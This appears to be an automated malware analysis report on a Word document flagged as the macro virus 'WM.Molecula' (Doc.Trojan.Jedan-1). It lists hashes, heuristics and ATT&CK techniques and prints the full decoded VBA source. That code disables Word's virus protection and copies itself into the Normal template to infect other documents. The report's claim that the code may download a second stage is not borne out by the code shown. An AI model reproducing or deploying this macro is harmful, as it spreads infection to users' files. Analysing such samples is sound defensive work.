Office (OLE) malware analysis — malicious · 9b63dfb258a15996

MALICIOUS

Office (OLE)

54.5 KB Created: 2000-10-01 21:57:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: f6ce592f3e8494a3ff5212a4768283d2 SHA-1: e12812e6b86ef45f3c32edf3e6b31677ad097027 SHA-256: 9b63dfb258a15996e82b8ad892de409e2ae2727c50fd923573f46740ea41b093

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The macro code, identified as 'Molecula' and 'WM.Molecula by e[ax]', appears to be designed to bypass antivirus heuristics and potentially download a second-stage payload. The presence of the 'Document_Open' macro and the heuristic firings strongly suggest a malicious intent, likely related to malware delivery.

Heuristics 3

ClamAV: Doc.Trojan.Jedan-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Jedan-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1147 bytes
SHA-256: `00c6087d19b3141ceffecfd60abd5fdef9c894aaf5be60f88e16e4a1f178d0fb`
Detection ClamAV: Doc.Trojan.Jedan-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Molecula Private Sub Document_Open(): Const nula = 0: Const jedan = 1: Options.VirusProtection = nula If Not ThisDocument = ActiveDocument Then Set a = ActiveDocument Else Set a = NormalTemplate Set b = a.VBProject: Set c = b.VBComponents(1): Set d = c.CodeModule With d: g = Strings.Trim(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(jedan, _ ThisDocument.VBProject.VBComponents(1).CodeModule.countoflines)) If .Lines(1, 1) <> "'Molecula" Then .deletelines jedan, d.countoflines .insertlines jedan, g End If End With If Day(Now()) = jedan Then MsgBox "...i posle svega ja sam jos tu...tu medju Vama!", vbCritical, "...Molecula" End If End Sub 'WM.Molecula by e[ax] 'Jos jedan virus koji moze zaobici NAV2K i AVP heuristike '..a koji koristi String metodu inficiranja! 'Sve pozdrave saljem ljudima na #virus i #vxers

Open this report in the interactive analyzer, or submit your own file for analysis.